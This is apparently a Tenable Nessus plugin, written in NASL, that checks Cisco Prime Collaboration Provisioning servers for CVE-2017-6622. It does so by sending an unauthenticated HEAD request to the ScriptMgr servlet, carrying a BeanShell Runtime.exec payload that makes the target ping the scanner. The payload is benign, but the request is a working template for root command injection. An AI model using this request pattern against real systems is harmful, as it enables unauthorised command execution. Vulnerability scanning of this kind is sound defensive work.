CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:L/Au:N/C:C/I:C/A:C
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
EPSS
Percentile
98.4%
The remote Cisco Prime Collaboration Provisioning server is affected by a remote command execution vulnerability in the ScriptMgr servlet due to a failure to restrict the HTTP HEAD method. An unauthenticated, remote attacker can exploit this to bypass authentication and execute arbitrary commands with root privileges.
Note that the remote Cisco Prime Collaboration Provisioning server is reportedly affected by additional vulnerabilities; however, Nessus has not tested for these.
#
# (C) Tenable Network Security, Inc.
#
include("compat.inc");
if (description)
{
# Metadata branch: the scanner evaluates this when it loads the plugin
# catalogue; exit(0) at the end keeps it from reaching the check below.
script_id(101531);
script_version("1.6");
script_cvs_date("Date: 2019/03/06 18:38:55");
script_cve_id("CVE-2017-6622");
script_bugtraq_id(98520);
script_xref(name:"CISCO-BUG-ID", value:"CSCvc98724");
script_xref(name:"CISCO-SA", value:"cisco-sa-20170517-pcp1");
script_xref(name:"ZDI", value:"ZDI-17-445");
script_name(english:"Cisco Prime Collaboration Provisioning ScriptMgr Servlet Authentication Bypass RCE");
# The summary is literal: this is an active check, not a version match.
script_summary(english:"Attempts to perform a remote command injection.");
script_set_attribute(attribute:"synopsis", value:
"The remote network management server is affected by a remote command
execution vulnerability.");
script_set_attribute(attribute:"description", value:
"The remote Cisco Prime Collaboration Provisioning server is affected
by a remote command execution vulnerability in the ScriptMgr servlet
due to a failure to restrict the HTTP HEAD method. An unauthenticated,
remote attacker can exploit this to bypass authentication and execute
arbitrary commands with root privileges.
Note that the remote Cisco Prime Collaboration Provisioning server is
reportedly affected by additional vulnerabilities; however, Nessus has
not tested for these.");
# https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170517-pcp1
script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?e00b5d5b");
script_set_attribute(attribute:"see_also", value:"https://www.zerodayinitiative.com/advisories/ZDI-17-445/");
# Vendor fix is a version upgrade; no configuration-only mitigation is
# given here.
script_set_attribute(attribute:"solution", value:
"Upgrade to Cisco Prime Collaboration Provisioning version 12.1 or
later.");
script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H");
script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C");
script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
script_set_attribute(attribute:"exploit_available", value:"true");
# Vulnerability and patch were published on the same day; the plugin
# followed roughly two months later.
script_set_attribute(attribute:"vuln_publication_date", value:"2017/05/17");
script_set_attribute(attribute:"patch_publication_date", value:"2017/05/17");
script_set_attribute(attribute:"plugin_publication_date", value:"2017/07/13");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_set_attribute(attribute:"cpe", value:"cpe:/a:cisco:prime_collaboration_provisioning");
script_set_attribute(attribute:"cpe", value:"cpe:/a:cisco:prime_collaboration");
# exploited_by_nessus + ACT_ATTACK below: the scanner will send a request
# that makes the target execute a command, so this plugin only runs in
# scan policies that permit attack-category checks.
script_set_attribute(attribute:"exploited_by_nessus", value:"true");
script_end_attributes();
script_category(ACT_ATTACK);
script_family(english:"CISCO");
script_copyright(english:"This script is Copyright (C) 2017-2019 Tenable Network Security, Inc.");
# Runs only after the detection plugin has populated the PCP version key.
script_dependencies("cisco_prime_collaboration_provisioning_detect.nbin");
script_require_keys("Host/Cisco/PrimeCollaborationProvisioning/version");
exit(0);
}
include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
# Make sure pcp is detected
# The KB key is written by the detection plugin this script depends on;
# without it the check is not applicable and exits here.
get_kb_item_or_exit("Host/Cisco/PrimeCollaborationProvisioning/version");
port = get_http_port(default:443);
# Vulnerable ScriptMgr servlet is reached through mod_jk
# Banner gate: without "Apache ... mod_jk" in the Server header the host
# is audited as not vulnerable and nothing else is sent.
banner = get_http_banner(port:port);
if (banner !~ "Server:.*Apache.*mod_jk")
{
audit(AUDIT_LISTEN_NOT_VULN, "Web server", port);
}
# Detection marker: this plugin's own script name, capped at 16 characters
# (ping's -p option accepts at most 16 pad bytes; hexstr() below encodes
# each character as two hex digits).
pat = SCRIPT_NAME;
if(strlen(pat) > 16)
pat = substr(pat, 0, 15);
# Proof of execution: the target is asked to ping the scanner with the
# marker embedded in the ICMP payload. %20 is a URL-encoded space.
cmd = "ping%20-c%2010%20" + "-p%20" + hexstr(pat) + "%20" + compat::this_host();
# BeanShell (language=bsh) snippet passed to the servlet's compile command;
# it only runs the ping above and writes nothing to the host.
qs = 'command=compile&language=bsh&script=foo&scripttext=Runtime.getRuntime().exec("' + cmd + '");';
uri = "/cupm/ScriptMgr?" + qs;
# HEAD is the method the description says the servlet fails to restrict.
# Detection note: a HEAD request to /cupm/ScriptMgr carrying scripttext in
# the query string, followed by outbound ICMP from the PCP host whose
# payload contains this plugin name, are the observable artifacts of this
# check in web server logs and network captures.
method = "HEAD";
# exit_on_fail: TRUE aborts the plugin if the request cannot be sent, so
# the capture below only runs after an actual response.
res = http_send_recv3(
method : method,
item : uri,
port : port,
exit_on_fail : TRUE
);
# Only a 200 status line is worth listening for; any other status leaves
# vuln unset and the host is audited as not vulnerable below.
if(res[0] =~ "^HTTP/[0-9]\.[0-9] 200")
{
# Capture ICMP echo requests from the target addressed to the scanner.
# NOTE: the verdict depends on the target being able to reach the scanner
# over ICMP. If that path is filtered, a vulnerable host is reported as
# not vulnerable (false negative) rather than as an error.
filter = "icmp and src " + get_host_ip() + " and dst " + compat::this_host() +
" and icmp[icmptype] = icmp-echo";
bpf = bpf_open(filter);
if(isnull(bpf)) audit(AUDIT_FN_FAIL, "bpf_open");
# Listen for up to 5 seconds. ping -c 10 sends ten echo requests (one per
# second by default), so the first should arrive well inside the window.
timeout = 5;
t = unixtime();
repeat
{
frame = bpf_next(bpf:bpf);
# ping back seen: cmd injection succeeded !
# >< is NASL substring match: the marker must appear in the raw frame.
if (frame && pat >< frame)
{
vuln = TRUE;
break;
}
}until(unixtime() - t > timeout);
bpf_close(bpf);
}
# vuln is assigned only inside the capture loop; on every other path it is
# unset, which NASL evaluates as false here.
if(vuln)
{
# Include the exact request that triggered the callback so the finding
# can be reproduced and matched against server logs.
req = http_last_sent_request();
security_report_v4(
port : port,
severity : SECURITY_HOLE,
generic : TRUE,
request : make_list(req)
);
}
else
{
audit(AUDIT_LISTEN_NOT_VULN, "Web server", port);
}